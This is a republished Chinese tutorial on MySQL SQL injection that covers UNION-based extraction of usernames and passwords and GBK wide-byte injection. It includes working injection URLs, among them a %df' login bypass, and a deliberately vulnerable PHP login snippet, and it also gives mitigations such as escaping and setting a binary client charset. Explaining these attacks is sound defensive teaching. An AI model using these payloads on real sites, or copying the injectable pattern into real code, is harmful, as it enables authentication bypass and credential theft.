MySQL中SQL的单字节注入与宽字节注入

作者:吴军 来源:junney 时间:2009-03-25 14:49:00 

一、单字节SQL注入

MYSQL的SQL注入已经由来已久,以下是普遍采用的注入步骤:

1、在GET参数上加一个/*或者#(mysql专有的注释),判断数据库是否是mysql,比如:
http://www.xxx.com.cn/article.php?id=1607 and 1=1/*

2、猜解某表的字段数,从order by 1一直更改到页面出错为止,就可以得到该表的字段数

注入URL:http://www.xxx.com.cn/article.php?id=1607 or 1=1 order by 10#

对应的SQL: select * from articles where id=1607 or 1=1 order by 10#….


3、使用该表和用户表进行关联查询,在文章列表里就可以看到用户名和密码了。当也要猜解用户表的表名和用户名、密码的字段名,比如上一步得到的字段数是5:

注入的URL:http://www.xxx.com.cn/article.php?id=1607 or 1=1 union select  username,password,1,2,3 from user

对应的SQL: select * from articles where id=1607 or 1=1  union select  username,password,1,2,3 from user


这样就可以在界面上看到用户名和密码了。

解决方法:

过滤数据:这并不是罗唆。在合适的地方使用良好的数据过滤,可以减小多数安全隐患,甚至可以消除其中的一部分。

将数据用括号包含:如果你的数据库允许(MySQL 允许),在 SQL 语句中,不论什么类型的数据都用单引号包含起来。

转义数据:一些合法的数据可能在无意中破坏 SQL 语句本身的格式。使用 mysql_escape_string() 或者所使用数据库提供的转移函数。如果没有提供这样的函数,addslashes() 也是不错的最后选择。

二、宽字节注入

宽字节注入也是在最近的项目中发现的问题,大家都知道%df’ 被PHP转义(开启GPC、用addslashes函数,或者icov等),单引号被加上反斜杠\,变成了 %df\’,其中\的十六进制是 %5C ,那么现在 %df\’ = %df%5c%27,如果程序的默认字符集是GBK等宽字节字符集,则MYSQL用GBK的编码时,会认为 %df%5c 是一个宽字符,也就是縗’,也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了。比如:


以下为引用的内容:

$conn = mysql_connect(”localhost”,”root”,”2sdfxedd”);
mysql_query(”SET NAMES ‘GBK’”);
mysql_select_db(”test”,$conn);
$user = mysql_escape_string($_GET['user']);
$pass = mysql_escape_string($_GET['pass']);
$sql = “select * from cms_user where username = ‘$user’ and password=’$pass’”;
$result = mysql_query($sql,$conn);
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {
$rows[] = $row;
}
?>


则通过以 * 入即可:

http://www.xxx.com/login.php?user=%df’%20or%201=1%20limit%201,1%23&pass=

对应的SQL是:

select * from cms_user where username = ‘運’ or 1=1 limit 1,1#’ and password=”

解决方法:就是在初始化连接和字符集之后,使用SET character_set_client=binary来设定客户端的字符集是二进制的。如:


以下为引用的内容:

mysql_query(”SET character_set_client=binary”);            

标签:MySQL,SQL
0
投稿

猜你喜欢

  • 解决python 3 urllib 没有 urlencode 属性的问题

    2022-03-31 12:42:44
  • python类和继承用法实例

    2021-07-24 17:31:30
  • Mysql性能优化案例 - 覆盖索引分享

    2024-01-27 15:16:59
  • Web标准学习:CSS样式书写风格

    2008-03-25 09:37:00
  • 用python实现一个简单计算器(完整DEMO)

    2023-11-10 11:03:48
  • python 多进程并行编程 ProcessPoolExecutor的实现

    2023-10-23 14:41:56
  • 详解python之简单主机批量管理工具

    2023-04-24 07:45:44
  • Django3.2 自动发现所有路由代码详解

    2022-08-10 21:35:14
  • mysql 一个较特殊的问题:You can't specify target table 'wms_cabinet_form'

    2024-01-24 19:07:13
  • python数据结构之搜索讲解

    2022-12-31 08:09:02
  • php中ob_flush函数和flush函数用法分析

    2023-11-15 06:12:59
  • Go语言中如何通过方法为类型添加行为

    2024-01-31 18:02:10
  • django实现模板中的字符串文字和自动转义

    2023-10-18 16:49:46
  • Django中ajax发送post请求 报403错误CSRF验证失败解决方案

    2021-06-11 19:47:32
  • Python实现字符串反转的常用方法分析【4种方法】

    2022-01-05 04:08:08
  • Go语言接口用法实例

    2024-02-04 22:27:30
  • pytorch制作自己的LMDB数据操作示例

    2023-05-24 11:51:27
  • Python 创建子进程模块subprocess详解

    2022-02-21 06:47:39
  • 用Vue封装导航栏组件

    2023-07-02 16:51:46
  • Python 中的 global 标识对变量作用域的影响

    2021-11-24 00:16:47
  • asp之家 网络编程 m.aspxhome.com